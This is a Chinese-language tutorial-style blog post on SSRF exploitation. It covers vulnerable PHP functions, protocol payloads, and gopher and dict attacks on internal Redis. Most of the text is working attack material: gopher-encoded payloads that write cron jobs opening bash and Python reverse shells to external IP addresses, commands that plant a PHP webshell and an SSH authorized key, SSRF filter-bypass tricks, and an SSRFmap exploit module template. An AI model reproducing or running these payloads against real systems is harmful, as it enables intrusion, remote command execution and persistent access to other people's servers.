SSRF漏洞攻擊利用從淺到深

梳理一下ssrf

不詳細 簡單記錄 

0x01 SSRF成因和基本利用
0x02 內網打未受權redis
0x03 關於ssrf打受權的redis
0x04 寫redis shell和密鑰的一點問題
0x05 SSRF Bypass
0x06 SSRFmap

last

 

 

 

0x01 SSRF成因和基本利用

 

php vul function:

file_get_contents()
fsockopen()
curl_exec()

readfile()

 

 

example:

<?php
function curl($url){
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_HEADER, 0); 
                curl_exec($ch);
                curl_close($ch); 
}
$url = $_GET['url'];
curl($url);
?>

<?php
function Getfile($host, $port, $link){
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if(!$fp){
        echo "$errstr (error number $errno) \n";
    }else{
        $out = "GET $link HTTP/1.1\r\n";
        $out .= "HOST $host \r\n";
        $out .= "Connection: Close\r\n\r\n";
        $out .= "\r\n";
        fwrite($fp, $out);
        $content = '';
        while(!feof($fp)){
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}

$url = $_GET['url'];
echo file_get_contents($url);

 

功能:

內網探測服務banner

file讀文件

內網配合其餘服務getshell

 

協議:

 

file:///
dict://
sftp://
ldap://
tftp://
gopher://

File

url=file:///etc/passwd
url=file:///C:/Windows/win.ini

dict:// -

http://example.com/ssrf.php?dict://etc/passwd

 

sftp:// -
Sftp表明SSH文件傳輸協議，或安全文件傳輸協議，是SSH的內含協議，在安全鏈接上與SSH相似。

http://example.com/ssrf.php?url=sftp://evil.com:1337/

ldap:// or ldaps:// or ldapi:// -
LDAP表明輕量級目錄訪問協議。它是一種經過IP網絡管理和訪問分佈式目錄信息服務的應用協議。

url=ldap://localhost:1337/%0astats%0aquit
url=ldaps://localhost:1337/%0astats%0aquit
url=ldapi://localhost:1337/%0astats%0aquit
tftp:// -
簡單文件傳輸協議是一種簡單的鎖步文件傳輸協議，它容許客戶端從遠程主機獲取文件或將文件放到遠程主機上。

url=tftp://evil.com:1337/TESTUDPPACKET

gopher:// -
Gopher是一種分佈式的文檔傳遞服務。它容許用戶以無縫的方式探索、搜索和檢索駐留在不一樣位置的信息。

url=http://attacker.com/gopher.php

 

 

 

 

 

 

 

 

 

 

 

 

關鍵字地方字典fuzz便可

 

 

 

 

 

 

 

 

0x02 內網打未受權redis

在基礎鏡像加corntab

FROM python:3.6-slim
MAINTAINER whx3000 <wanghaoxi3000@163.com>

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
    cron && \
    rm -rf /var/lib/apt/lists/* && \
    apt-get clean

RUN chmod +x ./docker-entrypoint.sh

ENV LC_ALL C.UTF-8
ENTRYPOINT ["./docker-entrypoint.sh"]

docker-entrypoint.sh

#!/bin/bash
set -x

env >> /etc/default/locale
/etc/init.d/cron start

 

build便可。

 

 

不必定使用gopher協議   curl要二次編碼

dict 
curl -vvv 'dict://127.0.0.1:6379/info'

# file
curl -vvv 'file:///etc/passwd'

# gopher 
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

 

 

 

 

webshell:

redis-cli -h 127.0.0.1 flushall
redis-cli -h 127.0.0.1 config set dir /var/www
redis-cli -h 127.0.0.1 config set dbfilename shell.php
redis-cli -h 127.0.0.1 set webshell "<?php phpinfo();?>"
redis-cli -h 127.0.0.1 save

curl -v 'http://xxx.xxx.xx.xx/xx.php?url=
gopher://xxxx:6379/
_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.220.140%2f2333%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'

 

_POST /demo1.php HTTP/1.1
Host: 192.168.17.132
User-Agent: curl/7.42.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

cmd=ccccc

bash -i >& /dev/tcp/192.168.17.158/2333 0>&1

 

反彈shell

redis-cli.exe -h 192.168.18.138
config set dir /var/spool/cron
set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.15.3/5555 0>&1\n\n\n"
config set dbfilename root
save

dict://serverip:port/cmd:param

/xx.php?url=dict://172.21.0.2:6379/info
/xx.php?url=dict://172.21.0.2:6379/get:user
/xx.php?url=dict://172.21.0.2:6379/flushall

 

 

寫密鑰:

127.0.0.1:6379> config set dir /root/.ssh
OK
127.0.0.1:6379> config set dbfilename authorized_keys
OK
127.0.0.1:6379> set 1 "\n\nssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsJ4pbjXL5KnnX/FP6sZORaT3N8/A6SEYv23VfrIVoPdOCBVD98O+RExVWCe8Iknwzx3w1Hm2uWnB6i6AtCnIji3yz16HIPryzoLE65xN4Z2vGXZk2YmOuRtqFPKPk/QCdf1Vxh6lwLZRo2msYEK/+mziOrmYy1UzwqLxfl1uNYVYTs2jHGBEikPwA7FAt5ZVRRBhzDnn8dyT201FOwR/fpukiXbaevZU2/iyW+Qu9ssaZMJMpRzautNuZLxCmV9TfuP0NbsgCBHj1nOMf3BUQNXUtE4aCRP0gHbs18Wvpx5ryWyl/NWWQADOY2dMHMWuTtCxLSrfY/q+H8l+JGdQpw==\n\n"
OK
127.0.0.1:6379> save

 

 

 

 

 

 

 

 

 

0x03 關於ssrf打受權的redis

官網：

https://redis.io/topics/protocol

　　

 使用RESP協議

• 客戶端向Redis服務器發送一個僅由Bulk Strings組成的RESP Arrays。
• Redis服務器回覆發送任何有效RESP數據類型做爲回覆的客戶端。

Bulk Strings用於表示長度最大爲512 MB的單個二進制安全字符串，按如下方式編碼：

• 一個$字節後跟組成字符串的字節數（一個前綴長度），由CRLF終止。

 

如今數據包中的每一行數據就好理解了。每個*number表明每一行命令，number表明每行命令中數組中的元素個數。$number表明每一個元素的長度。

*1
$8
flushall
*3
$3
set
$1
1
$22


<?php phpinfo();?>


*4
$6
config
$3
set
$3
dir
$4
/tmp
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save

 

認證:

sed -i 's/#requirepass 123123/requirepass 123123/g' /etc/redis.conf

 

 

 

 

認證傳遞的字符數組

*2
$4
AUTH
$6
123123

 

官網對於命令的說明

Request-Response model.
A client can use the same connection in order to issue multiple commands. Pipelining is supported so multiple commands can be sent with a single write operation by the client, without the need to read the server reply of the previous command before issuing the next one. All the replies can be read at the end..

 

Redis客戶端支持管道操做，能夠經過單個寫入操做發送多個命令，而無需在發出下一個命令以前讀取上一個命令的服務器回覆。全部的回覆均可以在最後閱讀。

這也是Redis在認證狀況下依然能夠被攻擊到緣由。

從新構造數據包

%2A2%0d%0a%244%0d%0aAUTH%0d%0a%246%0d%0a123123%0D%0A

 

 

 

 

 

 

0x04 寫redis shell和密鑰的一點問題

折騰了好久  不想說太多 

root@ax9a2j9sajxa9:/var/spool/cron/crontabs# ll
total 12
drwx-wx--T 2 root crontab 40236 Dec  5 18:43 ./
drwxr-xr-x 3 root root    4092 Dec  3 17:57 ../
-rw------- 1 root crontab 1341 Dec  3 06:47 root
root@fe8fb94b7fb1:/etc# ll crontab 
-rw-r--r-- 1 root root 743 Apr  5  20169crontab

 

須要root起起來才能夠  docker裏默認redis。寫計劃error

py 

1
* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

 

bash:

*/1 * * * * /bin/bash -i >& /dev/tcp/xxxx/12345 0>&1

 

關於payload被截斷

 

get 1
"* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"115.28.78.16\",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
127.0.0.1:6379> save
OK

00000000: 5245 4449 5330 3030 36fe 0000 c001 c340  REDIS0006......@
00000010: c440 fb02 2a20 2aa0 011f 2f75 7372 2f62  .@..* *.../usr/b
00000020: 696e 2f70 7974 686f 6e20 2d63 2027 696d  in/python -c 'im
00000030: 706f 7274 2073 6f63 6b65 1574 2c73 7562  port socke.t,sub
00000040: 7072 6f63 6573 732c 6f73 2c73 7973 3b73  process,os,sys;s
00000050: 3d80 1a00 2e80 0600 2880 0608 2e41 465f  =.......(....AF_
00000060: 494e 4554 2ca0 0e1f 534f 434b 5f53 5452  INET,...SOCK_STR
00000070: 4541 4d29 3b73 2e63 6f6e 6e65 6374 2828  EAM);s.connect((
00000080: 2231 3135 2e32 382e 0737 382e 3136 222c  "115.28..78.16",
00000090: 3620 0019 2929 3b6f 732e 6475 7032 2873  6 ..));os.dup2(s
000000a0: 2e66 696c 656e 6f28 292c 3029 3b20 e00a  .fileno(),0); ..
000000b0: 1600 31e0 0d16 0432 293b 703d e001 ab07  ..1....2);p=....
000000c0: 2e63 616c 6c28 5b22 60db 0b73 6822 2c22  .call(["`..sh","
000000d0: 2d69 225d 293b 27ff 8c5e 76ca 1e73 7b64  -i"]);'..^v..s{d

 

寫入ssh authorized_keys 沒被截斷

 

ssh 的問題:

 

目錄 權限問題 

 

authorized key 600 權限   ssh目錄700權限

 

 

 

目標須要開啓ssh  容許RSA認證

 

 

還有的就是路徑問題:

 

 

 最後就是curl寫shell時候  ; ? 須要編碼。

 

 

 

 

 

 

 

 

0x05 SSRF Bypass

http://127.0.0.1:80

http://localhost:22

http://[::]:80/ >>> http://127.0.0.1

http://example.com@127.0.0.1

127。0。0。1 >>> 127.0.0.1

短地址

http://dwz.cn/11SMa >>> http://127.0.0.1

 

 

特殊地址

利用的原理是DNS解析

 

http://127.0.0.1.xip.io/

http://www.owasp.org.127.0.0.1.xip.io/

 

 

 

字符集

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com

List:

① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳

⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇

⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛

⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵

Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ

ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ

⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴

⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

 

 

 

 

進制

能夠是十六進制，八進制等。

115.239.210.26 >>> 16373751032

首先把這四段數字給分別轉成16進制，結果：73 ef d2 1a

而後把 73efd21a 這十六進制一塊兒轉換成8進制

記得訪問的時候加0表示使用八進制(能夠是一個0也能夠是多個0 跟XSS中多加幾個0來繞過過濾同樣)，十六進制加0x

http://127.0.0.1 >>> http://0177.0.0.1/

http://127.0.0.1 >>> http://2130706433/

 

http://192.168.0.1 >>> http://3232235521/

http://192.168.1.1 >>> http://3232235777/

 

 

 

 

 

 

 

0x06 SSRFmap

 

 

 

 

 

 

 

使用模版改腳本:

from core.utils import *

import logging

 

name          = "servicename inlowercase"

description   = "ServiceName RCE - What does itdo"

author        = "Name or pseudo of theauthor"

documentation= ["http://link_to_a_research", "http://another_link"]

 

class exploit():

    SERVER_HOST = "127.0.0.1"

    SERVER_PORT = "4242"

 

    def __init__(self, requester, args):

        logging.info("Module '{}' launched!".format(name))

 

        # Handle args for reverse shell

        if args.lhost == None: self.SERVER_HOST= input("Server Host:")

        else:                  self.SERVER_HOST = args.lhost

 

        if args.lport == None: self.SERVER_PORT= input("Server Port:")

        else:                  self.SERVER_PORT = args.lport

 

        # Data for the service

        # Using a generator to create the hostlist

        # Edit the following ip if you need totarget something else

        gen_host =gen_ip_list("127.0.0.1", args.level)

        for ip in gen_host:

            port = "6379"

            data ="*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"

            payload = wrapper_gopher(data, ip ,port)

 

            # Handle args for reverse shell

            payload = payload.replace("SERVER_HOST",self.SERVER_HOST)

            payload =payload.replace("SERVER_PORT", self.SERVER_PORT)

 

            # Send the payload

            r =requester.do_request(args.param, payload)

 

 

 

DZ EXample

 

http://127.0.0.1:8899/forum.php?mod=ajax&action=downremoteimg&message=%5Bimg%3D1%2C1%5Dhttp%3A%2f%2f127.0.0.1%3A9999%2fgopher.php%3Fa.jpg%5B%2fimg%5D

gopher.php 

<?php
header("Location: gopher://127.0.0.1:2333/_test");
?>

 

 其餘:

 

 

 

  

 

最近本身得控制熬夜通宵了，別猝死了。

 

tip:多喝熱水